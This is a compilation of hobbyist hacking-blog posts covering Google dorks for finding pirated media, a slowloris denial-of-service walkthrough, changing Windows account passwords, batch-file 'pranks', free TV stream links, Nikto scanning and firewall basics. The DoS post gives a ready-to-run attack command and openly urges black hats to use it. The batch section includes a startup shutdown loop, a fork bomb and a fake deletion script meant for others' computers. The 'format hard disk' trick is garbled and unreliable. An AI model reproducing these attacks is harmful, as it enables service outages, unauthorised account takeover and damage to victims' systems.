Google Dork - A curse or A Blessing

It is said that everything you searches in google results in some answers. But do you know that the Google is so powerful that it can even reflect your private information. 
These private information are accessed by many hackers in order to exploit you. Some of them are even very helpful to make our search results more accurate and easy.

"Those who live the internet for them its a blessing and those who knows the internet for them its a curse. It depends upon you how you make it for you."Now we have done enough of talking lets get right into it.

I use google.com as my primary search engine because it presently tops the charts as far as
the sites that it indexes which means more pertinent info per search.

1. Page translation.
Just because someone speaks another language doesn't mean they dont have anything useful to say. I use translation tools like the ones found at

http://babelfish.altavista.com
and

http://world.altavista.com
to translate a few key words I am searching for. Be specific and creative because these tools arent the most accurate things on the planet.

2. Directories.
These days everything is about $$$. We have to deal/w SEO (search engine optimization) which seems like a good idea on paper until you do a search for toys and get 5 pornsites in the first 10 results. Using a sites directory will eliminate that. You can narrow your search down easily by looking for the info in specific catagories. (PS google DOES have directories, they're at: directory.google.com)

3. Here are some tips that google refers to as "advanced"

A. "xxxx" / will look for the exact phrase. (google isnt case sensitive)
B. -x / will search for something excluding a certain term
C. filetype:xxx / searches for a particular file extention (exe, mp3, etc)
D. -filetype:xxx / excludes a particular file extention
E. allinurl:x / term in the url
F. allintext:x / terms in the text of the page
G. allintitle:x / terms in the html title of that page
H. allinanchor:x / terms in the links

4. OR
Self explanatory, one or the other... (ie: binder OR joiner)

5. ~X
Synonyms/similar terms (in case you can't think of any yourself)

6. Numbers in a range.
Lets say you're looking for an mp3 player but only want to spend up to $90. Why swim through all the others? MP3 player $0..$90 The 2 periods will set a numeric range to search between. This also works with dates, weights, etc

7. +
Ever type in a search and see something like this:
"The following words are very common and were not included in your search:"
Well, what if those common words are important in your search? You can force google to search through even the common terms by putting a + in front of the denied word.

8. Preferences
It amazes me when I use other peoples PCs that they dont have their google search preferences saved. When you use google as much as I do, who can afford to not have preferences? They're located on the right of the search box, and have several options, though I only find 2 applicable for myself...
A. Open results in new browser
B. Display 10-100 results per page. (I currently use 50 per page, but thats a resolution preference, and 5X's the default)

9. *
Wildcard searches. Great when applied to a previously mentioned method. If you only know the name of a prog, or are looking for ALL of a particular file (ie. you're DLing tunes) something like *.mp3 would list every mp3.

10. Ever see this?
"In order to show you the most relevant results, we have omitted some entries very similar to the X already displayed. If you like, you can repeat the search with the omitted results included." The answer is YES. yes yes yes. Did I mention yes? I meant to.

11. Search EVERYWHERE
Use the engine to its fullest. If you dont find your answer in the web section, try the group section. Hell, try a whole different search engine. Dont limit yourself, because sometimes engines seem to intentionally leave results out.
ex. use google, yahoo, and altavista. search the same terms... pretty close, right? Now search for disney death. Funny, altavista has plenty of disney, but no death...hmmm.

12. Search for specific file type
Use the engine to search for the specific file type like 3gp, mp4, pdf, xls, doc, etc...
ex. if you want to search for a pdf on hacking just visit google.com and in search type:- hacking filetype:pdf

If you've read this far into this tutorial without saying, "Great, a guy that copied a few google help pages and thinks its useful info" then I will show you WHY (besides accuracy, speed, and consistancy finding info on ANYTHING) its nice to know how a search engine works. You combine it with your knowledge of other protocol.

Example:
Want free music? Free games? Free software? Free movies? God bless FTP! Try this search:
intitle:"Index of music" "rolling stones" mp3
Substitute rolling stones/w your favorite band. No? Try the song name, or another file format. Play with it. Assuming SOMEONE made an FTP and uploaded it, you'll find it.

For example....I wanted to find some Sepultura. If you don't know about this Brazillian band then google them out.
intitle:"Index of music" "Sepultura" mp3 <-- nothing
intitle:"Index of música" "Sepultura" mp3 <-- nothing
intitle:"Index of musica" "Sepultura" mp3 <-- not good enough
intitle:"Index of music" "Sepultura" * <-- found great stuff, but not enough Sepultura

At this point it occurs to me that I may be missing something, so I try:
intitle:"index of *" "sepultura" mp3 <-- BANG!
(and thats without searching for spelling errors)
Also try inurl:ftp

I find that * works better for me than trying to guess other peoples mis-spellings.

The same method applies for ebooks, games, movies, SW, anything that may be on an FTP site.

intitle:"index of" "google hacks" ebook

***Now sometimes there are certain searches which are blocked by college and still we want to open those sites and download their content. If you want such tricks to open them without using proxy then contact me @ prashantsavior@gmail.com or comment below.

Article by: Unpredictable

Distributed Denial of Service Attack - DDoS attack (Part-1)

Hey guys! Sorry for being away for quite long. Today I am going to post on a very easy but harmful hack.
We can easily take down many sites from this although it is for small period but yet it can suffer a huge loss.
I hope many of you have guessed my topic of today's discussion. Yes its Distributed Denial of Service (DDoS) attack.
We can perform this attack in many ways but today I am posting the tutorial on slowloris but before we start lets see what is DDoS attack.

About: DDoS, fairly called as Denial of Service attack is one of the most powerful attack which is very tough to stop by any of the server although it takes time to perform.
In this we send a huge amount of packets to the port of the site which is open usually it is port 80 or attacks on those port which are open and ready to accept the packets.
These huge amount of packets creates a great traffic in the site and ultimately take it down till the attack is being performed or the server blocks the ip which is sending the packets.

Many of you must be thinking that what will happen if the site goes down for few hours???
Think about the big shopping sites like flipkart, ebay, amazon, etc., if they get down for few hours how much they will suffer a loss. Similarly, if someone attacks on stock exchange then just think how much unthinkable loss can happen in hours.

***Performing DDoS attack is under cyber crime. So think before you act.
Words for white hat hackers: Report the admin of the web page if you find any unimportant open port which is accepting the packets.
Words for programmers: Please check your codes and make sure most of the ports are closed and the codes are properly written and has no open segments.
Words for black hat hackers: Follow the tutorial to take down the site and don't forget to use proxy.

DDoSing via Slowloris:
Step 1: Download and install "active perl" from the link Click here to download Active Perl
Step 2: Download this slowloris script by clicking here Click here to download slowloris and save in any of your desired location and file extension as .pl (this is extension for perl script files). Like I have saved it in C:\downloads\DDOS\slowloris
Step 3: Open cmd by pressing windows+r (run dialog box appears) and then type cmd and hit enter.
Step 4: Go to the location by typing its address.
C:\downloads\DDOS
and press enter
Step 5: Run the slowloris script on the site. Here my target site is www.target-site.com
C:\downloads\DDOS> slowloris.pl -dns www.target-site.com -port 80 -timeout 1 -num 1000 -cache

Here you can change the port number to any other port which is open.

Check the site after few hours. Boom... You have taken it down.
For any query please comment below or write to us @ prashantsavior@gmail.com and don't forget to like our Facebook Page

Author: Unpredictable

CHANGE WINDOWS PASSWORD WITHOUT KNOWING THE OLD PASSWORD

Note: This trick works only if the computer is turned on and then you can change the password.

Step 1: Click on start and then search for cmd (i.e., command prompt).

Step 2: Right click and then click on Run as administrator. It will prompt for request to proceed. Click on OK and then the command window will open.

Step 3: Type net user. This command is used to find the name of all the user account present in the computer.

Step 4: Change the password of all the user account one by one by typing.
net user useraccount password
Here useraccount is the account which you got from the step 3 and in place of password type your desired password.

With these simple steps you can change your Windows password or even of yours friends.

Author: Unpredictable

For more information feel free to contact us @ prashantsavior@gmail.com or you can even comment below.

AWESOME NOTEPAD TRICKS

NOTEPAD TRICKS

Notepad can be used to make simple script which can sometimes be fruitful, sometimes becomes enjoyable and sometimes destructive. It depends entirely upon you how you use this. In this tutorial I will show you how can you use notepad for various purpose.

Warning: Don't try few things on your computer, it may damage your OS. So it will be mentioned is status which to try and which not to.


Trick 1: Make your PC talk what you type.
Status: Must try it (safe to use).

Open your notepad and copy paste the following code and save it as speak.vbs . Here the file extension should be .vbs.

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")

sapi.Speak msg

After you have saved it then open the vbs script, you will be prompted to enter text. Type the text and hear your PC say that.

Trick 2: Make your CD drive pop out constantly.
Status: Can try it (nearly safe)

Open your notepad and copy paste the following code and save it as cdrom.vbs . Here the file extension should be .vbs.

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100

loop

After you have saved it then open the vbs script, your cd rom will pop out. Everytime you put it inside it will pop out.

How to stop: Press alt+ctrl+del. 

                        Go to Processes.

                       Look for wscript.exe and stop that.

Trick 3: To make keyboard LED flash.

Status: You may try (nearly safe to use).

Open your notepad and copy paste the following code and save it as led.vbs . Here the file extension should be .vbs.

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{SCROLLLOCK}"

loop

After you have saved it then open the vbs script, your all led in the keyboard will flash.

Trick 4: To Pop up fake error message.

Status: Must try it (safe to try)

Open your notepad and copy paste the following code and save it as fake.bat . Here the file extension should be .bat.

msg * Error: Your system is affected by virus

After you have saved it then open the bat file, you will get a fake error message popping out.

Trick 5: Format Hard disk.

Status: Dont' try unless you need it (not safe).

Open your notepad and copy paste the following code and save it as format.exe . Here the file extension should be .exe.

Code : 01001011000111110010010101010101010000011111100000

After you have saved it then open the bat file, you will get a fake error message popping out.

Trick 6: Shutdown computer forcefully

Status: Safe to use

Open your notepad and copy paste the following code and save it as shutdown.bat . Here the file extension should be .bat.

@echo off
msg * Shutdown computer.
shutdown -c “Sleep Tight” -s

After you have saved it then open the bat file, your computer will shutdown forcefully.

Trick 7: Delete all the files
Status: Don't try on your laptop (try it on others unless he is your enemy)

Open your notepad and copy paste the following code and save it as delete.bat (don't change the filename). Here the file extension should be .bat.

This prank will make your friends think that all of their files are being deleted and then at the end the file deletes itself so it is untraceable. 

 @echo off 

echo do you want to delete all of your computer data? (y/n) 

pause >nul

echo Do not exit out of the screen or all computer data will be deleted. 

ping localhost -n 2 > nul 

echo Are you sure you want to delete all computer data? (y/n) 

pause >nul 

echo deleting all data... 

echo. 

echo. 

pause localhost -n 2 > nul 

dir /s 

echo. 

echo. 

ping localhost -n 2 > nul 

cls 

echo error.. error.. Not all data deleted, are you sure you wish to stop? (y/n) 

pause 

echo. 

echo. 

ping localhost -n 1 > nul 

cls 

dir /s 

echo. 

echo. 

ping localhost -n 2 >nul 

cls 

echo all data has been deleted.. 

pause 

del "c:delete.bat" 

After you have saved it then open the bat file, your files will get deleted.

Trick 8: Command Prompt Virus

Status: You can try but you might not close that.

Open your notepad and copy paste the following code and save it as virus.bat. Here the file extension should be .bat.

start virus.bat 

virus.bat

This will open infinite command prompt.

Trick 9: Shutdown computer every time you start it.

Status: Don't Try (try it on your own risk)

Open your notepad and copy paste the following code and save it as anything.bat. Here the file extension should be .bat.

copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”

copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” 

//these two commands will copy the batchfile in start up folders (in XP)

shutdown -s -t 00 //this will shutdown the computer in 0 seconds 

Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder.

Start up folder path in Windows 7 is 

C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Every time the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. 

How to stop: You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

Trick 10: Fork Bomb

Status: Try it on your own risk

Open your notepad and copy paste the following code and save it as fork.bat. Here the file extension should be .bat.

%0|%0 

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows.

Author: Unpredictable

If you have any query then comment below or you can write us @ prashantsavior@gmail.com.

WATCH LIVE TV FROM VLC

WATCH LIVE TV STREAMING USING VLC (watch for  free)

Do you know that you can watch live TV channel for free using vlc? For this you just need two things:

1. VLC media player (which you can download by clicking here. Click here to Download.

2. A Good internet speed.

So, now lets start with this.

Step 1: Open your vlc player.

Step 2: Click on Media then on click on Stream, or you can press Ctrl + S.

Step 3: Click on network and then paste the url of the stream channel. Here is the list of some channel. Rest you can Google it out and post in the comment to help others.

NDTV:       rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_33.sdp

NDTV Profit:  rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_31.sdp

Times Now:  rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_2.sdp

Aaj Tak:   rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_4.sdp

CNBC Aawaz:   rtsp://ss1c6.idc.mundu.tv:554/prf1/cid_34.sdp

CNBC TV 18:    rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_35.sdp

Headlines Today:   rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_7.sdp

NDTV 24×7:   rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_29.sdp

NK News:   rtsp://94.75.250.53:554/rtplive/rknews.sdp

RAJ News:   rtsp://94.75.250.220:1935/live/rajnews2.sdp

ETV:   rtsp://94.75.250.53/rtplive/etv2low.sdp

Studio N:   rtsp://94.75.250.220:1935/live/studion2

SVBC:   rtsp://94.75.250.220/rtplive/svbclow

Zoo Vision:    rtsp://stream.zoovision.com/live.sdp

B4u Music:    rtsp://217.146.95.166:554/playlist/ch12zqcif.3gp

iMusic:   rtsp://217.146.95.166:554/playlist/ch26yqcif.3gp

Zee Tamil: rtsp://121.244.145.226:554/prf1/cid_54.sdp

Zee Kannad:   rtsp://121.244.145.226:554/prf1/cid_55.sdp

Zee Bangla:   rtsp://121.244.145.226:554/prf1/cid_52.sdp

Music Box:   rtsp://stream.the.sk/live/musicbox/musicbox-3m.3gp

Bella Tv:   rtsp://217.146.95.166:554/playlist/ch29yqcif.3gp

Fashion Tv:   rtsp://217.146.95.166:554/playlist/ch27yqcif.3gp

Adventure:    rtsp://video3.multicasttech.com/AFTVAdventure3GPP296.sdp

Horror:    rtsp://video2.multicasttech.com/AFTVHorror3GPP296.sdp

Comedy:   rtsp://video3.multicasttech.com/AFTVComedy3GPP96.sdp

Classic:    rtsp://video3.multicasttech.com/AFTVClassics3GPP296.sdp

Crime:   rtsp://video2.multicasttech.com/AFTVCrime3GPP296.sdp

Mystery:   rtsp://video2.multicasttech.com/AFTVMystery3GPP296.sdp

Clubbing Tv:   rtsp://217.146.95.166:554/playlist/ch21yqcif.3gp

Step 4: Then click on Play after choosing it from the drop down menu.

Enjoy it....

Author: Unpredictable

If you have a query then comment or mail us @ prashantsavior@gmail.com

Website Scanning Through Nikito (in Backtrack 5)

Website Scanning Tutorial Through Nikto

When we talk about scanning website to find the vulnerability, we have many tools in Backtrack 5/ Kali Linux which serves the best and "Nikto" is one of them. These tools are efficiently used to measure the security level of the web applications.

About Nikto:

• Nikto is an open source.

• It can check a web server for over 6400 potentially dangerous files/CGIs.

• It checks for outdated versions of over 1000 servers, and version specific problems on over 270 servers.

• It checks the plug in and un-configured files.

• Fast & Effective.

• It finds out the default files and programs.

• It finds out the insecure files and programs.

Features:

• Full HTTP proxy support.

• Apache user name enumeration.

• Logging to Metasploit.

• Secure Socket Layer support (SSL).

• Sub-domain brute forcing (guessing).

• Easy to update.

• Save report on multiple format.

Requirements:

• Backtrack 5 / Kali Linux with Perl installed in it.

• OpenSSL

• Active State Perl

Tutorial:

The basic scan requires a host to scan, that means you need a website to scan. You can use a IP of the website or just its website name. Here I have taken the website as http://www.mytargetsite.com/ . You can take the website which you want to scan.

Open Nikto by following this:

1. To scan a website for the vulnerability we type:

$ perl nikito.pl -host http://www.mytargetsite.com/

or

$ perl nikito.pl -h http://www.mytargetsite.com/

2. For help:

$ perl nikto.pl -H http://www.mytargetsite.com/

3. If you want to check different port than use:

$ perl nikto.pl -h http://www.mytargetsite.com/ -p [port number]

4. If you want this test via proxy than you can use by this command:

$ perl nikto.pl -h http://www.mytargetsite.com/ -useproxy http://localhost:8080/

5. Now for updating nikto use:

$ perl nikto.pl -update 

6. To search vulnerability in multiple port within a range (e.g., we are searching port no. 80 to 100):

$ perl nikto.pl -h http://www.mytargetsite.com/ -port 80-100

7. To save the scan result in a text file for later use:

$ perl nikto.pl -h http://www.mytargetsite.com/ -output ./filename.txt

Note: Nikto scans port no. 80 by default. If you want to scan different port then choose another port (step 3).

For any query comment below or write us @ prashantsavior@gmail.com

Article by: Unpredictable

INTRODUCTION TO FIREWALL

A basic Introduction to Firewalls

Introduction to firewalls 

When you use internet in your college/school/ office, you may not be able to access some websites.

So do you know how they block those websites? They use firewalls for blocking the websites.

Firewall prevent the system from hackers attack. It also prevents you from various viruses. You can that it saves your Cyber life but just to some extent as there is nothing absolute.

So lets see what actually is this firewall!!!

*** The first question arises in our mind is What is Firewall? 

--->Firewall is working like a security guard standing outside the office. Usually, What the security guard do? He will allow those who has identity card and block those who has not the identity card.

Likewise, The firewall will block unauthorized access to the system. Firewall may be a software or hardware. It will work based on the set of rules defined by the administrator. Using Firewall administrator can block certain website from being accessed. All traffic from inside and outside of the network must pass through the firewall. Only authorized traffic will be allowed to pass (based on the set of rules).

***Second question which you must be thinking is what are the Types of Firewalls?

--->So here is a basic classification of types of firewall

 (i) Packet Filtering 

 (ii) Appliction level gateway

 (iii) Circuit level gate way 

(i) Packet Filtering (Network Layer):

A packet filtering router applies a set of rules to each incoming IP packet and then forwards or discards the packets. Router is configured such that it can filter incoming and outgoing packets. The packets will filtered based on the source and destination IP address. IP spoofing attack is possible in this packet filtering. IP spoofing can be achieved by changing the source IP address of packets. Stateful Inspection Firewalls. 

A stateful inspection packet filters tightens the rules of TCP traffic by creating a state table of out bound TCP connection. If the packet matches with existing connection based on the state table, it will be allowed. If it does not match, It will be evaluated according to the rule set for new connections. 

(ii) Applictaion Level Gateway:

Application level gateway is also known as proxy server. The user communicate with the gateway using application layer of TCP/IP stack. The gateway asks the user for the name of the remote host to be connected. When the user enters valid user ID, gateway will give access to the remote application. This will block the malicious activity and correct the application behavior. This will ensure the safety of company. More secure than packet filtering. Easy to log and audit all incoming traffic at the application level. Application-level filtering may include protection against spam and viruses as well, and be able to block undesirable Web sites based on content rather than just their IP address 

(iii) Circuit Level Gateway:

The circuit level gateway works at session layer of OSI model. Monitor TCP handshaking between packets to make sure a session is legitimate. Traffic is filtered based on the session rules. Circuit-level firewalls hide the network itself from the outside, which is useful for denying access to intruders. But they don't filter individual packets. This firewall is used when the administrator trusts internal users.

***So, Why Firewall?

--->Firewall block unauthorized users, prohibits vulnerable services from entering or leaving the network. Protection from IP spoofing and routing attacks. Protection against Remote login, Trojan backdoors, Session hijacking, cookie stealing,etc.

*** So by now you must be hunt with a question that does it have any limitations? If yes then What are the Limitation of Firewalls?

--->The firewall cannot protect against attacks that by pass the firewall. The firewall does not protect against internal threats. The firewall cannot protect against the transfer of virus infected programs or files. It would be impossible for the firewall to scan all incoming files, emails for viruses.

Author: Unpredictable

For query feel free to write us @ prashantsavior@gmail.com or comment below.

And don't forget to like us on Facebook